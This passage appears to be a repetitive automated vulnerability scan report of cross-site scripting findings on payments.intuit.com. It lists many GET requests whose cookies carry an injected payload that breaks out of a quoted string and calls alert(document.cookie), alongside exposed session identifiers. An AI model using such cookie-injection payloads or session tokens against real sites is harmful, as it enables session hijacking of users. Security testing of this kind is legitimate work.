s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sbweb/common/includes/header/super_navigation/includes/search.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?launchHelpMeChoose=true HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
